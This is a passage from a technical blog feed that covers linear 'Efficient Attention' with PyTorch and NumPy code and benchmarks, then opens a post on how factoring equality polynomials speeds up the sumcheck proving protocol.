&lt;p&gt;The trade-off is clear: by applying softmax before computing similarities, Efficient Attention smooths out the attention distribution. Instead of sharply focusing on the most relevant position (3), it distributes attention more uniformly across all positions. This flattening effect is why the mechanism is sometimes described as capturing broad semantic themes rather than precise positional relationships.&lt;br &#x2F;&gt;
This limitation explains why state-of-the-art language models still prefer standard attention despite its quadratic cost; the ability to attend precisely to specific tokens is crucial for many language understanding tasks. However, although Efficient Attention is not commonly used in LLMs, it remains highly valuable for AI models in other domains. In applications such as computer vision, where inputs represent pixels in images, the model can still perform well with this type of attention mechanism, making the substantial efficiency gains well worth the trade-off.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;code-implementation-and-benchmarks&quot;&gt;Code implementation and benchmarks&lt;&#x2F;h2&gt;
&lt;p&gt;To get a rough idea of the improvements in computational resources with Efficient Attention, we will run comparisons for several values of $N$ and see how each of the Attention implementations scales as $N$ increases.&lt;&#x2F;p&gt;
&lt;p&gt;We’ll see how easy it is to implement these functions using PyTorch and also to use them as a layer in an LLM.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;import torch&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;def dot_product_attention(Q, K, V):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    attn_scores = torch.matmul(Q, K.T)                 # N x N&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    attn_weights = torch.softmax(attn_scores, dim=-1)  # N x N&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return torch.matmul(attn_weights, V)               # N x d&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;   &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;def efficient_attention(Q, K, V):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Q_smr = torch.softmax(Q, dim=-1)                   # N x d&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    K_smc = torch.softmax(K, dim=-2)                   # N x d&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    KV = torch.matmul(K_smc.T, V)                      # d x d&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return torch.matmul(Q_smr, KV) &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
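&lt;p&gt;As a cross-check for environments without PyTorch, the same two functions can be mirrored in NumPy (a sketch, not the benchmarked code; the max-subtraction inside the softmax is a standard numerical-stability trick that PyTorch performs internally). It also makes explicit that the efficient variant never materializes an $N \times N$ matrix:&lt;&#x2F;p&gt;

```python
import numpy as np

def softmax(x, axis):
    e = np.exp(x - x.max(axis=axis, keepdims=True))  # subtract max for stability
    return e / e.sum(axis=axis, keepdims=True)

def dot_product_attention(Q, K, V):
    attn = softmax(Q @ K.T, axis=-1)   # N x N attention weights
    return attn @ V                    # N x d

def efficient_attention(Q, K, V):
    Q_smr = softmax(Q, axis=-1)        # row-wise softmax, N x d
    K_smc = softmax(K, axis=0)         # column-wise softmax, N x d
    return Q_smr @ (K_smc.T @ V)       # (N x d) @ (d x d) -> N x d

rng = np.random.default_rng(0)
N, d = 128, 16
Q, K, V = rng.normal(size=(3, N, d))
```

&lt;p&gt;The intermediate $K^T V$ product is only $d \times d$, which is where the linear scaling in $N$ comes from.&lt;&#x2F;p&gt;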
&lt;p&gt;Below you can see a comparison of the execution times for different values of the sequence length $N$, for both Attention implementations.&lt;&#x2F;p&gt;
&lt;p&gt;For reference, these benchmarks were run on a machine with the following specs:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **GPU:** NVIDIA RTX A4000 (16 GB)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **OS:** Ubuntu 22.04 LTS (Kernel 5.15.0-157)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **CPU:** 8 × Intel(R) Xeon(R) Gold 5315Y @ 3.20 GHz&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;execution_time.png?raw=true&quot; alt=&quot;Im 2&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Similarly, below is the comparison for the memory resources&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;memory_usage.png?raw=true&quot; alt=&quot;Im 3&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;As one can see, at the beginning the memory and performance are similar for both (although better for the linear attention implementation), but for larger sequence lengths, both the time and memory requirements of the original implementation grow quadratically (plots are in log-log scale, so a steeper slope means a higher polynomial exponent), whilst the Efficient Attention implementation keeps growing only linearly.&lt;&#x2F;p&gt;
&lt;p&gt;You can see the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;linear_attention_blog&#x2F;blob&#x2F;main&#x2F;notebook&#x2F;benchmark.ipynb&quot;&gt;code used for the benchmarks&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The same repository also includes a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;linear_attention_blog&#x2F;blob&#x2F;main&#x2F;transformer.py&quot;&gt;full Transformer implementation&lt;&#x2F;a&gt; following the GPT architecture, with a configuration option to switch between &lt;strong&gt;Efficient Attention&lt;&#x2F;strong&gt; and the &lt;strong&gt;original Dot Product Attention&lt;&#x2F;strong&gt; , providing a broader view of how everything fits together.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;Efficient Attention has been shown to be much more memory and performance efficient than the usual Dot Product Attention, allowing much larger contexts to be processed thanks to its linear dependency on the sequence length. So why isn’t it more widely adopted? State-of-the-art models would rather pay the high costs of training with standard attention to keep that small edge in accuracy over the competition.&lt;&#x2F;p&gt;
&lt;p&gt;Nevertheless, efficient attention implementations remain important in domains such as video generation or genomics, where context sizes can inherently become very large.&lt;&#x2F;p&gt;
&lt;p&gt;In this blog post, we’ve presented the original and simplest implementation of linearized attention; however, this is an ever-evolving field, and new and improved implementations have emerged, such as CosFormer, LinFormer, and Mamba. Some modern architectures also take a hybrid approach, mixing standard and efficient attention heads to balance accuracy and stability.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;references&quot;&gt;References&lt;&#x2F;h2&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Efficient Attention paper](https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1812.01243)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * &amp;lt;https:&#x2F;&#x2F;github.com&#x2F;lucidrains&#x2F;linear-attention-transformer&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * &amp;lt;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=LgsiwDRnXls&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * &amp;lt;https:&#x2F;&#x2F;cmsflash.github.io&#x2F;ai&#x2F;2019&#x2F;12&#x2F;02&#x2F;efficient-attention.html&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;</description>
      </item>
      <item>
          <title>How factoring equality polynomials optimizes sumcheck</title>
          <pubDate>Thu, 25 Sep 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-factoring-equality-polynomials-optimizes-sumcheck/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-factoring-equality-polynomials-optimizes-sumcheck/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-factoring-equality-polynomials-optimizes-sumcheck/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;In this article we will continue our study and analysis of the work by Bagad, Dao, Domb and Thaler, “Speeding up SUMCHECK”, regarding optimizations for the SUMCHECK protocol applied to polynomials that are products of multilinear polynomials. It is now time to dive into specifics: since equality polynomials are widely used in cryptographic environments, a closer look is in order.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;once-upon-a-time&quot;&gt;Once upon a time…&lt;&#x2F;h2&gt;
&lt;p&gt;The reader of this article must surely have come across equality polynomials (also known as “eq polynomials”) - polynomials that evaluate to zero at all points of their domain but one, where they evaluate to one. In the usual real analysis jargon, they are also known as indicator functions for points in Cartesian space. Recalling the role of multilinear polynomials in one and several variables, equality polynomials can be obtained by multiplying together “smaller ones”. Concretely, suppose $\mathbb{F}$ is a field and let $\omega \in \mathbb{F}^\ell$: this is&lt;&#x2F;p&gt;
&lt;p&gt;$$\omega = (\omega_1, \omega_2, \ldots, \omega_\ell)$$&lt;&#x2F;p&gt;
&lt;p&gt;for $\omega_i \in \mathbb{F}$. Suppose now that we partition $\omega$ into blocks; for instance, suppose we want to split it into three blocks, say&lt;&#x2F;p&gt;
&lt;p&gt;$$\omega = (\omega_L,\omega_C,\omega_R)$$&lt;&#x2F;p&gt;
&lt;p&gt;where $L,C,R$ are a partition of $[\ell] = \{1,2,\ldots \ell \}$ such that $$l &amp;lt; c &amp;lt; r \quad \forall\ l \in L, c\in C, r\in R$$. These subsets indicate the indices involved in each ’‘chunk’’ of $\omega$. If the reader needs some help visualizing this, just think&lt;&#x2F;p&gt;
&lt;p&gt;$$\omega = (2,3,4,2,5,5) = ((2,3), (4,2), (5,5))$$&lt;&#x2F;p&gt;
&lt;p&gt;for $L = \{1,2\}, C = \{3,4\}, R = \{5,6\}$.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;The good thing about block partitioning points is that it is compatible with factorization of equality polynomials: $$\omega = (\omega_L ,\omega_R )\implies eq_\omega (x) = eq_{\omega_L}(x_L ) eq_{\omega_R} (x_R )$$ for $x = (x_L,x_R)$, a block partition of the variable $x$.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
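&lt;p&gt;The factorization in the quote above is easy to verify numerically over the Boolean hypercube, using the standard formula $eq_\omega(x) = \prod_i \big(\omega_i x_i + (1-\omega_i)(1-x_i)\big)$; plain Python integers stand in for field arithmetic here:&lt;&#x2F;p&gt;

```python
from itertools import product

def eq(w, x):
    """Multilinear equality polynomial on {0,1}^len(w): 1 iff x == w."""
    out = 1
    for wi, xi in zip(w, x):
        out *= wi * xi + (1 - wi) * (1 - xi)
    return out

w = (1, 0, 1, 1)
w_L, w_R = w[:2], w[2:]

for x in product((0, 1), repeat=4):
    x_L, x_R = x[:2], x[2:]
    # Block factorization: eq_w(x) = eq_{w_L}(x_L) * eq_{w_R}(x_R)
    assert eq(w, x) == eq(w_L, x_L) * eq(w_R, x_R)

# Sanity check: eq_w is the indicator of the single point w.
assert eq(w, w) == 1
assert sum(eq(w, x) for x in product((0, 1), repeat=4)) == 1
```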
&lt;p&gt;This is of course absolutely compatible with the tensor nature of the interpolation basis of multilinear polynomials, and comes as no surprise. One extra observation comes in handy and will play a crucial role, especially when summing evaluations of polynomials defined over finite fields. Whenever a polynomial $f$ can be block-factored as shown above, its integral (i.e. the sum of its evaluations) can be computed sequentially; in other words, there is a clever reordering of the domain of evaluation we can take advantage of. Specifically, suppose $x\in\mathbb{F}^\ell$ and that&lt;&#x2F;p&gt;
&lt;p&gt;$$f(x) = f_L (x_L ) f_R (x_R )$$&lt;&#x2F;p&gt;
&lt;p&gt;then &lt;strong&gt;the sum over all $x$ can be indexed according to any of its blocks&lt;&#x2F;strong&gt; :&lt;&#x2F;p&gt;
&lt;p&gt;$$\sum\limits_{x\in\mathbb{F}^\ell } f(x) = \sum\limits_{ x\in\mathbb{F}^\ell } f_L (x_L ) f_R (x_R ) = \sum\limits_{ x_R\in\mathbb{F}^R }\sum\limits_{ x_L\in\mathbb{F}^L } f_L (x_L ) f_R (x_R )$$&lt;&#x2F;p&gt;
&lt;p&gt;where by fixing the index in the outer sum, the factors involving that very index can be taken out of the inner sum (i.e. distributive law in reverse), so&lt;&#x2F;p&gt;
&lt;p&gt;$$\sum\limits_{ x\in\mathbb{F}^\ell } f(x) = \sum\limits_{ x_R\in\mathbb{F}^R } f_R (x_R ) \sum\limits_{ x_L\in\mathbb{F}^L } f_L (x_L )$$&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;This sort of idea is the one we’ll discuss and exploit: fixing $X_R$ will allow us to pre-compute sums over $X_L$ in which $X_R$ is treated as a parameter: in this sense, the inner sum is pre-computed and then re-used whenever the parameter $X_R$ is invoked.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;strong&gt;If the reader is wondering what is the name of the game: the name of the game is accumulate, accumulate, accumulate (but cleverly).&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
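&lt;p&gt;A tiny numerical check of this reordering, with made-up factors $f_L, f_R$ over the set $\{0,\ldots,4\}$ (sums taken over the integers for simplicity rather than in a finite field):&lt;&#x2F;p&gt;

```python
from itertools import product

F = range(5)  # stand-in for a small field; we sum over the integers here

def f_L(x_L):           # made-up left factor
    return x_L[0] + 2 * x_L[1]

def f_R(x_R):           # made-up right factor
    return 3 * x_R[0] + x_R[1]

# Naive sum over all of F^4: 5**4 = 625 evaluations of the product.
naive = sum(f_L(x[:2]) * f_R(x[2:]) for x in product(F, repeat=4))

# Split sum: two independent sums of 25 evaluations each, multiplied once.
split = (sum(f_L(x_L) for x_L in product(F, repeat=2))
         * sum(f_R(x_R) for x_R in product(F, repeat=2)))

assert naive == split
```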
&lt;h2 id=&quot;ideas-ideas&quot;&gt;Ideas(ideas)&lt;&#x2F;h2&gt;
&lt;p&gt;We’re now ready to dive into the optimizations proposed by BDDT. The starting point is a sum-check protocol over a polynomial of the form $$g(X) = \tilde{eq}(w, X) \cdot p(X)$$ where $p(X)$ is itself a product of $d$ multilinear polynomials. This makes $g(X)$ a polynomial of degree $d+1$. In each round $i$ of the sum-check protocol, the prover must send a univariate polynomial $s_i (X)$, which is the sum of $g(X)$ over the remaining variables. To define this polynomial, the prover needs to compute $d + 2$ of its evaluations.&lt;&#x2F;p&gt;
&lt;p&gt;The authors build on the work by Angus Gruen and take it even further. Briefly, &lt;strong&gt;Gruen’s key idea&lt;&#x2F;strong&gt; is to leverage the special structure of the equality polynomial, $\tilde{eq}$. This polynomial can be decomposed into a product:&lt;br &#x2F;&gt;
$$\tilde{eq}(w, (r_1 , …, r_{i - 1}, X_i, x_{i + 1}, …, x_l )) = \underbrace{\tilde{eq}(w_{[&amp;lt;i]}, r_{[&amp;lt;i]}) \cdot \tilde{eq}(w_i, X_i)}_{\text{linear part } l_i(X_i)} \cdot \underbrace{\tilde{eq}(w_{[&amp;gt;i]}, x’)}_{\text{remaining part}}$$&lt;&#x2F;p&gt;
&lt;p&gt;The effect of this decomposition is that the round polynomial, $s_i (X_i)$ originally defined as the sum over $x^\prime$ now looks like a product:&lt;&#x2F;p&gt;
&lt;p&gt;\begin{equation}&lt;br &#x2F;&gt;
\begin{split}&lt;br &#x2F;&gt;
s_i (X_i) &amp;amp;=\sum\limits_{x’}g(r,X_i,x’) = \sum\limits_{x’}eq(r,X_i,x’)p(r,X_i,x’) \newline&lt;br &#x2F;&gt;
&amp;amp;= \sum\limits_{x’}eq_{w&amp;lt;i}(r)eq_{w_i}(X_i)eq_{w&amp;gt;i}(x’)p(r,X_i,x’) \newline&lt;br &#x2F;&gt;
&amp;amp;= eq_{w&amp;lt;i}(r)eq_{w_i}(X_i)\left(\sum\limits_{x’}eq_{w&amp;gt;i}(x’)p(r,X_i,x’)\right)&lt;br &#x2F;&gt;
\end{split}&lt;br &#x2F;&gt;
\end{equation}&lt;&#x2F;p&gt;
&lt;p&gt;The round polynomial is now the product of &lt;strong&gt;a linear factor $l_i(X_i)$&lt;&#x2F;strong&gt;, namely&lt;&#x2F;p&gt;
&lt;p&gt;$$l_i(X_i) = eq_{w&amp;lt;i} (r) eq_{w_i} (X_i)$$&lt;br &#x2F;&gt;
that depends on the challenges from previous rounds ($r_{[&amp;lt;i]}$) and the current variable ($X_i$) and &lt;strong&gt;a degree-$d$ factor, $t_i(X_i)$:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;$$t_i(X_i) = \sum\limits_{x’}eq_{w&amp;gt;i}(x’)p(r,X_i,x’)$$&lt;&#x2F;p&gt;
&lt;p&gt;which contains the actual summation, including the product of the $p_k$ polynomials and the remaining part of the $\tilde{eq}$ polynomial. The polynomial to be calculated by the prover in the $i$-th round is then&lt;br &#x2F;&gt;
$$s_i(X_i) = l_i(X_i) \cdot t_i(X_i)$$&lt;&#x2F;p&gt;
&lt;p&gt;The reader might be wondering what the benefit of thinking of $s_i$ in this way is.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Instead of computing $d + 2$ evaluations of the complex polynomial $s_i(X)$ (degree $d + 1$), the prover now only needs to compute $d + 1$ evaluations of the simpler polynomial $t_i(X)$ (degree $d$). One of these evaluations, $t_i(1)$, can be derived from the protocol’s consistency check ($s_i(0) + s_i(1) = C_{i - 1}$), so in practice, only $d$ sums are explicitly calculated.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;In summary, Gruen reduces the degree of the polynomial that the prover must perform the most work on, saving the cost of one full evaluation in each round of the protocol. &lt;strong&gt;BDDT’s key idea is to re-apply the separability property of the $\tilde{eq}$ polynomial, but this time on the remaining variables being summed over ($x’$)&lt;&#x2F;strong&gt;, combined with their previous proposal of deflecting the evaluation of $p$ at the random challenges to the evaluation of Lagrange interpolation polynomials. In broad strokes, the novel work goes as follows:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. **Variable Splitting:** They divide the set of remaining variables $x&amp;#39;$ into two parts of proper length, which we for now call $x_L$ (left) and $x_R$ (right).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. **Nested Summation:** Thanks to this split, the sum to compute $t_i(u)$ can be rewritten as a nested sum: $$t_i(u) = \sum_{x_R} \tilde{eq}(w_R, x_R) \cdot \left( \sum_{x_L} \tilde{eq}(w_L, x_L) \cdot \prod_{k=1}^{d} p_k(r,u,x_L,x_R) \right)$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;This rewriting is the core of the optimization. The prover can now first compute the inner sum (over $x_L$) and then use those results for the outer sum (over $x_R$).&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;This “sum-splitting” technique yields very significant benefits in terms of time and, above all, memory.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Drastic Memory Reduction:** The standard method would require precomputing and storing a table with the evaluations of $\tilde{eq}(w, x)$ for all $x$—a table of size $2^l$. BDDT&amp;#39;s optimization **eliminates the need for this giant table**. Instead, the prover only needs to precompute tables for the evaluations of $\tilde{eq}$ over the halves of the variables ($x_L$ and $x_R$), which are of size $\approx 2^{l&#x2F;2}$. Moving from a memory requirement of $O(2^l)$ to $O(2^{ l&#x2F;2 })$ is an exponential improvement and makes much larger problems feasible.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Reduced Computational Cost (Time):** By avoiding multiplications with the large $\tilde{eq}$ table, the prover saves a considerable number of operations. The paper estimates this optimization reduces the cost by roughly $N$ multiplications between large field elements, where $N = 2^l$ is the size of the summation domain. The sums are processed over smaller domains iteratively, which improves memory locality and computational efficiency.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This optimization is applied during the first $l&#x2F;2$ rounds of the protocol. For the remaining rounds, the benefit diminishes, and the algorithm switches back to a standard method.&lt;&#x2F;p&gt;
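&lt;p&gt;The memory claim can be made concrete with a sketch: instead of one table of $2^\ell$ equality-polynomial evaluations, keep two tables of size $2^{\ell&#x2F;2}$ and combine their entries on the fly. The product $p$ below is a made-up stand-in for the product of multilinear factors, and $w$ is taken on the Boolean hypercube for simplicity (in the protocol $w$ is a general field point, but the table bookkeeping is identical):&lt;&#x2F;p&gt;

```python
from itertools import product

def eq(w, x):
    """Multilinear equality polynomial on the Boolean hypercube."""
    out = 1.0
    for wi, xi in zip(w, x):
        out *= wi * xi + (1 - wi) * (1 - xi)
    return out

def p(x):  # made-up stand-in for the product of multilinear factors
    return 1 + sum(x)

l = 8
w = tuple(i % 2 for i in range(l))
w_L, w_R = w[:l // 2], w[l // 2:]

# Two half-tables of size 2^(l/2) = 16 each, instead of one table of size 2^l = 256.
table_L = {x: eq(w_L, x) for x in product((0, 1), repeat=l // 2)}
table_R = {x: eq(w_R, x) for x in product((0, 1), repeat=l // 2)}

# Nested sum: inner sum over x_L, outer sum over x_R, eq split across both.
nested = sum(table_R[x_R] * sum(table_L[x_L] * p(x_L + x_R)
                                for x_L in table_L)
             for x_R in table_R)

# Same value as the computation that materializes the full 2^l-sized table.
full = sum(eq(w, x) * p(x) for x in product((0, 1), repeat=l))
assert nested == full
```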
&lt;h2 id=&quot;organization-beats-time&quot;&gt;Organization beats time&lt;&#x2F;h2&gt;
&lt;p&gt;The fact that the authors propose a combination of Gruen’s strategy and their own ideas from &lt;em&gt;SmallValues&lt;&#x2F;em&gt; optimization implies that there is special care to be taken at the time of evaluating the polynomials $l_i$ and $t_i$. At round $i$ the data sent to the verifier&lt;&#x2F;p&gt;
&lt;p&gt;$$s_i (u) = l_i (u) t_i (u)$$&lt;&#x2F;p&gt;
&lt;p&gt;has a part which is more computationally demanding: the computation of $t_i(u)$ for $u$ in an appropriately large set. So far, the only definition available for this polynomial is given by&lt;&#x2F;p&gt;
&lt;p&gt;$$t_i(u) = \sum_{x_R} \tilde{eq}(w_R, x_R) \cdot \left( \sum_{ x_L } \tilde{eq}(w_L, x_L) \cdot \prod_{k = 1}^{d} p_k(r,u,x_L,x_R) \right)$$&lt;&#x2F;p&gt;
&lt;p&gt;and still needs some clarification. How are the parts of $x’$ defined? How is this sum performed? How does it relate to the SmallValues optimization the authors worked out previously?&lt;&#x2F;p&gt;
&lt;p&gt;It needs to be stressed that this description is conceptually sound and contains the key ideas involved in this optimization. In addition, it must be mentioned that at this level, the block partition of the remaining vectors $x’$ and the factoring of the equality polynomials is a &lt;strong&gt;dynamic&lt;&#x2F;strong&gt; factor: the length of $x’$ is $\ell-i$ at round $i$ and so, in absolute terms, the lengths of $x_L$ and $x_R$ will vary from round to round.&lt;&#x2F;p&gt;
&lt;p&gt;While this is enough for a coffee table conversation, it leaves something to be desired from the algorithmic perspective, especially if some gains are to be expected.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;the-need-for-an-optimality-parameter&quot;&gt;The need for an optimality parameter&lt;&#x2F;h3&gt;
&lt;p&gt;In order to maneuver between conceptual clarity and efficient computation, the authors define an optimality parameter called $l_0$ - carefully chosen to minimize the prover’s total time. Its selection is based on a cost trade-off:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Cost of optimized rounds ($i \le l_0$)** : This cost (primarily `sl` multiplications) grows exponentially with $l_0$, as the size of the accumulators is on the order of $O((d + 1)^{l_0})$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Cost of standard rounds ($i &amp;gt; l_0$)**: This cost (primarily `ll` multiplications) decreases as $l_0$ increases, because there are fewer &amp;#39;&amp;#39;expensive&amp;#39;&amp;#39; rounds to execute.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The optimal value for $l_0$ is the one where these two costs are balanced. The paper provides a formula to estimate this optimal point for Algorithm 4, which depends on the polynomial’s structure (the number of factors, $d$) and the relative costs of hardware operations (the ratio $\kappa$ between the cost of an &lt;code&gt;ll&lt;&#x2F;code&gt; and an &lt;code&gt;ss&lt;&#x2F;code&gt; multiplication). The optimal switchover point $l_0$ can be estimated by the following formula:&lt;&#x2F;p&gt;
&lt;p&gt;$$l_0 = \frac{\log\left(\frac{\kappa \cdot d^2}{2(d - 1)}\right)}{\log(d + 1)}$$&lt;br &#x2F;&gt;
where:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $d$ is the number of multilinear factors.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\kappa$ is the factor difference in cost between a large-large (`ll`) and a small-small (`ss`) multiplication. The authors use $\kappa = 30$ for their estimations and provide a deeper background for that choice (the reader is encouraged to seek for details in the original article!)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
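&lt;p&gt;For concreteness, the formula can be evaluated directly for a few values of $d$ at the paper’s $\kappa = 30$ (a direct transcription of the estimate; real implementations would round $l_0$ to an integer and tune it empirically):&lt;&#x2F;p&gt;

```python
import math

def optimal_l0(d, kappa=30):
    """Estimated switchover round l_0 from the formula above."""
    return math.log(kappa * d ** 2 / (2 * (d - 1))) / math.log(d + 1)

# For d = 2 the estimate is roughly 3.7, so the optimized phase would
# cover the first three or four rounds; it shrinks as d grows.
estimates = {d: optimal_l0(d) for d in (2, 3, 4)}
```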
&lt;p&gt;This parameter strictly controls the regime in which the SUMCHECK protocol works at any given stage:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **If $i \le l_0$** : You are in the &amp;#39;&amp;#39;optimized phase&amp;#39;&amp;#39;. The protocol uses the pre-computed accumulators to compute the prover&amp;#39;s message very quickly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **If $i &amp;gt; l_0$**: You have crossed the threshold. The protocol switches to a more standard algorithm (like Algorithm 5) for the remaining rounds, as the benefit of the pre-computation has ended.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Now we are able to take a further look at the block partition of $x’$. The implementation of the authors’ optimization is based on a static partition of these points in terms of the optimization parameter $\ell_0$ and the number of variables $\ell$. This partition, written&lt;&#x2F;p&gt;
&lt;p&gt;$$x’ = (x_{in}, x_{out})$$&lt;&#x2F;p&gt;
&lt;p&gt;works in the same way as the dynamic one but allows for an efficient computation, since the lengths are now constant. The two parts represent a fixed split of the variables that are not in the $l_0$-round prefix.&lt;&#x2F;p&gt;
